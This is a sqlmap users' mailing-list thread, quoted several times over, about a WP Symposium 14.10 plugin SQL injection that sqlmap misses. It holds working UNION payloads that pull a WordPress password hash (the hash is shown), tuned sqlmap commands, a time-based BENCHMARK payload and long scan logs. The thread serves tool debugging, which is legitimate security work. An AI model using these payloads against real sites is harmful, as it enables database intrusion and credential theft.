sqlmap-users — sqlmap users mailing list

Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it

[Brandon P. <bpe...@gm...>]

Sorry, one more thing to note, the following command gets very close to
exploiting the injection:

./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t
/tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix="
LIMIT 1,1#" --union-char=f --prefix='in_deleted '

The only problem is that the union-char is 'f', when I was hoping it would
be 0x66. When I capture the request and replace 'f' with 0x66, the
injection works. Looks like ' is a bad char.

On Mon, Dec 15, 2014 at 11:29 AM, Brandon Perry <bpe...@gm...>
wrote:
>
> Playing with the queries sqlmap sends a bit more:
>
> action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1
>
> This results in a 0 being returned where the password hash was in the
> successful injection:
>
> 1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
>           ^ injection result
>
>
> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361#&mid=1
>
> This payload also results in a 0 being returned, not 'fdsa' as you would
> expect.
>
> However, this payload does return 'fdsa'
>
> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361 LIMIT
> 1,1#&mid=1
>
> 1[split]fdsa[split]in_deleted UNION ALL SELECT 0x66647361 LIMIT 1,1#[split]
>
>
> Hope this helps.
>
>
> On Mon, Dec 15, 2014 at 11:01 AM, Brandon Perry <bpe...@gm...
> > wrote:
>>
>> Here is the console output. Attached is the traffic log in a zip:
>>
>> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5
>> --risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt
>>          _
>>  ___ ___| |_____ ___ ___  {1.0-dev-180ede0}
>> |_ -| . | |     | .'| . |
>> |___|_  |_|_|_|_|__,|  _|
>>       |_|           |_|   http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
>> mutual consent is illegal. It is the end user's responsibility to obey all
>> applicable local, state and federal laws. Developers assume no liability
>> and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 08:56:27
>>
>> [08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
>> [08:56:27] [INFO] setting file for logging HTTP traffic
>> [08:56:27] [INFO] flushing session file
>> [08:56:27] [INFO] testing connection to the target URL
>> [08:56:27] [INFO] heuristics detected web page charset 'ascii'
>> [08:56:27] [INFO] testing if the target URL is stable. This can take a
>> couple of seconds
>> [08:56:28] [INFO] target URL is stable
>> [08:56:28] [WARNING] heuristic (basic) test shows that POST parameter
>> 'tray' might not be injectable
>> [08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
>> [08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause'
>> [08:56:28] [WARNING] reflective value(s) found and filtering out
>> [08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause (MySQL comment)'
>> [08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause (Generic comment)'
>> [08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>> clause'
>> [08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>> clause (MySQL comment)'
>> [08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>> clause (Generic comment)'
>> [08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING,
>> ORDER BY or GROUP BY clause (RLIKE)'
>> [08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter
>> replace (original value)'
>> [08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter replace
>> (MAKE_SET - original value)'
>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace
>> (ELT - original value)'
>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace
>> (bool*int - original value)'
>> [08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter
>> replace (original value)'
>> [08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter
>> replace (original value)'
>> [08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and
>> ORDER BY clauses'
>> [08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and
>> ORDER BY clauses (original value)'
>> [08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY
>> and ORDER BY clauses'
>> [08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and
>> ORDER BY clauses'
>> [08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
>> clause'
>> [08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING
>> clause (EXTRACTVALUE)'
>> [08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING
>> clause (UPDATEXML)'
>> [08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or HAVING
>> clause (BIGINT UNSIGNED)'
>> [08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING
>> clause'
>> [08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING
>> clause'
>> [08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING
>> clause (EXTRACTVALUE)'
>> [08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING
>> clause (UPDATEXML)'
>> [08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING
>> clause (BIGINT UNSIGNED)'
>> [08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING
>> clause'
>> [08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
>> (EXTRACTVALUE)'
>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
>> (UPDATEXML)'
>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace
>> (BIGINT UNSIGNED)'
>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER
>> BY clauses'
>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER
>> BY clauses (EXTRACTVALUE)'
>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER
>> BY clauses (UPDATEXML)'
>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and ORDER
>> BY clauses (BIGINT UNSIGNED)'
>> [08:58:08] [INFO] testing 'MySQL inline queries'
>> [08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
>> [08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
>> [08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy
>> query)'
>> [08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12 AND
>> time-based blind (heavy query)' injectable
>> [08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
>> [08:58:26] [INFO] automatically extending ranges for UNION query
>> injection technique tests as there is at least one other (potential)
>> technique found
>> [08:58:28] [INFO] target URL appears to be UNION injectable with 1 columns
>> [08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20
>> columns'
>> [08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
>> [08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to 40
>> columns'
>> [08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
>> [08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to 60
>> columns'
>> [08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
>> [08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to 80
>> columns'
>> [08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
>> [08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to 100
>> columns'
>> [08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
>> [08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to 20
>> columns'
>> [08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
>> [08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to 40
>> columns'
>> [08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
>> [08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to 60
>> columns'
>> [08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
>> [08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to 80
>> columns'
>> [08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
>> [08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to
>> 100 columns'
>> [08:58:54] [INFO] checking if the injection point on POST parameter
>> 'tray' is a false positive
>> POST parameter 'tray' is vulnerable. Do you want to keep testing the
>> others (if any)? [y/N] n
>> sqlmap identified the following injection points with a total of 2049
>> HTTP(s) requests:
>> ---
>> Parameter: tray (POST)
>>     Type: AND/OR time-based blind
>>     Title: MySQL < 5.0.12 AND time-based blind (heavy query)
>>     Payload: action=getMailMessage&tray=in_deleted AND
>> 9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1
>> ---
>> [08:59:48] [INFO] testing MySQL
>> [08:59:48] [WARNING] it is very important not to stress the network
>> adapter during usage of time-based payloads to prevent potential errors
>> do you want sqlmap to try to optimize value(s) for DBMS delay responses
>> (option '--time-sec')? [Y/n]
>> [08:59:51] [INFO] confirming MySQL
>> [08:59:53] [INFO] adjusting time delay to 1 second due to good response
>> times
>> [08:59:53] [INFO] the back-end DBMS is MySQL
>> web server operating system: Linux Ubuntu
>> web application technology: Apache 2.4.7, PHP 5.5.9
>> back-end DBMS: MySQL >= 5.0.0
>> [08:59:53] [INFO] fetched data logged to text files under
>> '/home/bperry/.sqlmap/output/172.31.16.26'
>>
>> [*] shutting down at 08:59:53
>>
>> bperry@ubuntu:~/tools/sqlmap$
>>
>> On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar <
>> mir...@gm...> wrote:
>>>
>>> Hi.
>>>
>>> I don't see a reason why this form of UNION test would be any different
>>> than the regular used by sqlmap. Can you please send me the traffic file
>>> for such run (... --flush-session -t traffic.txt) along with console
>>> output?
>>>
>>> Bye
>>> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...>
>>> wrote:
>>>
>>>> Hello!
>>>>
>>>> Playing around with the following vulnerabivlity:
>>>>
>>>> http://www.exploit-db.com/exploits/35505/
>>>>
>>>>
>>>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1
>>>> UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1'
>>>> does result in a response from the server with the hash of the first user:
>>>>
>>>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION
>>>> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>>>
>>>>
>>>> However, sqlmap only finds a time based injection. Looking at sqlmap
>>>> through burp, I do see sqlmap doesn't try an injection syntax like the one
>>>> used in the PoC. It may be useful to add a syntax of UNION (SELECT
>>>> CONCAT(blah, blah, blah) FROM blah).
>>>>
>>>> Just a thought!
>>>>
>>>>
>>>> --
>>>> http://volatile-minds.blogspot.com -- blog
>>>> http://www.volatileminds.net -- website
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>>>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>>>> with Interactivity, Sharing, Native Excel Exports, App Integration &
>>>> more
>>>> Get technology previously reserved for billion-dollar corporations, FREE
>>>>
>>>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>>
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>


-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it

[Brandon P. <bpe...@gm...>]

Playing with the queries sqlmap sends a bit more:

action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1

This results in a 0 being returned where the password hash was in the
successful injection:

1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
          ^ injection result


action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361#&mid=1

This payload also results in a 0 being returned, not 'fdsa' as you would
expect.

However, this payload does return 'fdsa'

action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361 LIMIT
1,1#&mid=1

1[split]fdsa[split]in_deleted UNION ALL SELECT 0x66647361 LIMIT 1,1#[split]


Hope this helps.


On Mon, Dec 15, 2014 at 11:01 AM, Brandon Perry <bpe...@gm...>
wrote:
>
> Here is the console output. Attached is the traffic log in a zip:
>
> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5
> --risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt
>          _
>  ___ ___| |_____ ___ ___  {1.0-dev-180ede0}
> |_ -| . | |     | .'| . |
> |___|_  |_|_|_|_|__,|  _|
>       |_|           |_|   http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 08:56:27
>
> [08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
> [08:56:27] [INFO] setting file for logging HTTP traffic
> [08:56:27] [INFO] flushing session file
> [08:56:27] [INFO] testing connection to the target URL
> [08:56:27] [INFO] heuristics detected web page charset 'ascii'
> [08:56:27] [INFO] testing if the target URL is stable. This can take a
> couple of seconds
> [08:56:28] [INFO] target URL is stable
> [08:56:28] [WARNING] heuristic (basic) test shows that POST parameter
> 'tray' might not be injectable
> [08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
> [08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> [08:56:28] [WARNING] reflective value(s) found and filtering out
> [08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause (MySQL comment)'
> [08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause (Generic comment)'
> [08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
> [08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause
> (MySQL comment)'
> [08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause
> (Generic comment)'
> [08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING,
> ORDER BY or GROUP BY clause (RLIKE)'
> [08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter replace
> (original value)'
> [08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter replace
> (MAKE_SET - original value)'
> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace
> (ELT - original value)'
> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace
> (bool*int - original value)'
> [08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter
> replace (original value)'
> [08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter
> replace (original value)'
> [08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and
> ORDER BY clauses'
> [08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and
> ORDER BY clauses (original value)'
> [08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and
> ORDER BY clauses'
> [08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and
> ORDER BY clauses'
> [08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
> clause'
> [08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING
> clause (EXTRACTVALUE)'
> [08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING
> clause (UPDATEXML)'
> [08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or HAVING
> clause (BIGINT UNSIGNED)'
> [08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING
> clause'
> [08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING
> clause'
> [08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING
> clause (EXTRACTVALUE)'
> [08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING
> clause (UPDATEXML)'
> [08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING
> clause (BIGINT UNSIGNED)'
> [08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING
> clause'
> [08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
> (EXTRACTVALUE)'
> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
> (UPDATEXML)'
> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace
> (BIGINT UNSIGNED)'
> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER
> BY clauses'
> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER
> BY clauses (EXTRACTVALUE)'
> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER
> BY clauses (UPDATEXML)'
> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and ORDER
> BY clauses (BIGINT UNSIGNED)'
> [08:58:08] [INFO] testing 'MySQL inline queries'
> [08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
> [08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
> [08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> [08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
> [08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy
> query)'
> [08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12 AND
> time-based blind (heavy query)' injectable
> [08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
> [08:58:26] [INFO] automatically extending ranges for UNION query injection
> technique tests as there is at least one other (potential) technique found
> [08:58:28] [INFO] target URL appears to be UNION injectable with 1 columns
> [08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20
> columns'
> [08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
> [08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to 40
> columns'
> [08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
> [08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to 60
> columns'
> [08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
> [08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to 80
> columns'
> [08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
> [08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to 100
> columns'
> [08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
> [08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to 20
> columns'
> [08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
> [08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to 40
> columns'
> [08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
> [08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to 60
> columns'
> [08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
> [08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to 80
> columns'
> [08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
> [08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to 100
> columns'
> [08:58:54] [INFO] checking if the injection point on POST parameter 'tray'
> is a false positive
> POST parameter 'tray' is vulnerable. Do you want to keep testing the
> others (if any)? [y/N] n
> sqlmap identified the following injection points with a total of 2049
> HTTP(s) requests:
> ---
> Parameter: tray (POST)
>     Type: AND/OR time-based blind
>     Title: MySQL < 5.0.12 AND time-based blind (heavy query)
>     Payload: action=getMailMessage&tray=in_deleted AND
> 9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1
> ---
> [08:59:48] [INFO] testing MySQL
> [08:59:48] [WARNING] it is very important not to stress the network
> adapter during usage of time-based payloads to prevent potential errors
> do you want sqlmap to try to optimize value(s) for DBMS delay responses
> (option '--time-sec')? [Y/n]
> [08:59:51] [INFO] confirming MySQL
> [08:59:53] [INFO] adjusting time delay to 1 second due to good response
> times
> [08:59:53] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Ubuntu
> web application technology: Apache 2.4.7, PHP 5.5.9
> back-end DBMS: MySQL >= 5.0.0
> [08:59:53] [INFO] fetched data logged to text files under
> '/home/bperry/.sqlmap/output/172.31.16.26'
>
> [*] shutting down at 08:59:53
>
> bperry@ubuntu:~/tools/sqlmap$
>
> On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar <
> mir...@gm...> wrote:
>>
>> Hi.
>>
>> I don't see a reason why this form of UNION test would be any different
>> than the regular used by sqlmap. Can you please send me the traffic file
>> for such run (... --flush-session -t traffic.txt) along with console
>> output?
>>
>> Bye
>> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...>
>> wrote:
>>
>>> Hello!
>>>
>>> Playing around with the following vulnerabivlity:
>>>
>>> http://www.exploit-db.com/exploits/35505/
>>>
>>>
>>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION
>>> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does
>>> result in a response from the server with the hash of the first user:
>>>
>>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION
>>> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>>
>>>
>>> However, sqlmap only finds a time based injection. Looking at sqlmap
>>> through burp, I do see sqlmap doesn't try an injection syntax like the one
>>> used in the PoC. It may be useful to add a syntax of UNION (SELECT
>>> CONCAT(blah, blah, blah) FROM blah).
>>>
>>> Just a thought!
>>>
>>>
>>> --
>>> http://volatile-minds.blogspot.com -- blog
>>> http://www.volatileminds.net -- website
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>>> Get technology previously reserved for billion-dollar corporations, FREE
>>>
>>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>


-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it

[Brandon P. <bpe...@gm...>]

Here is the console output. Attached is the traffic log in a zip:

bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5
--risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt
         _
 ___ ___| |_____ ___ ___  {1.0-dev-180ede0}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program

[*] starting at 08:56:27

[08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
[08:56:27] [INFO] setting file for logging HTTP traffic
[08:56:27] [INFO] flushing session file
[08:56:27] [INFO] testing connection to the target URL
[08:56:27] [INFO] heuristics detected web page charset 'ascii'
[08:56:27] [INFO] testing if the target URL is stable. This can take a
couple of seconds
[08:56:28] [INFO] target URL is stable
[08:56:28] [WARNING] heuristic (basic) test shows that POST parameter
'tray' might not be injectable
[08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
[08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:56:28] [WARNING] reflective value(s) found and filtering out
[08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause
(MySQL comment)'
[08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause
(Generic comment)'
[08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause
(MySQL comment)'
[08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause
(Generic comment)'
[08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (RLIKE)'
[08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter replace
(original value)'
[08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter replace
(MAKE_SET - original value)'
[08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace
(ELT - original value)'
[08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace
(bool*int - original value)'
[08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter
replace (original value)'
[08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter
replace (original value)'
[08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER
BY clauses'
[08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER
BY clauses (original value)'
[08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and
ORDER BY clauses'
[08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and
ORDER BY clauses'
[08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
clause'
[08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING
clause (EXTRACTVALUE)'
[08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING
clause (UPDATEXML)'
[08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or HAVING
clause (BIGINT UNSIGNED)'
[08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING
clause'
[08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING
clause'
[08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING
clause (EXTRACTVALUE)'
[08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING
clause (UPDATEXML)'
[08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING
clause (BIGINT UNSIGNED)'
[08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING
clause'
[08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
(EXTRACTVALUE)'
[08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
(UPDATEXML)'
[08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace
(BIGINT UNSIGNED)'
[08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY
clauses'
[08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY
clauses (EXTRACTVALUE)'
[08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY
clauses (UPDATEXML)'
[08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and ORDER BY
clauses (BIGINT UNSIGNED)'
[08:58:08] [INFO] testing 'MySQL inline queries'
[08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy
query)'
[08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12 AND
time-based blind (heavy query)' injectable
[08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[08:58:26] [INFO] automatically extending ranges for UNION query injection
technique tests as there is at least one other (potential) technique found
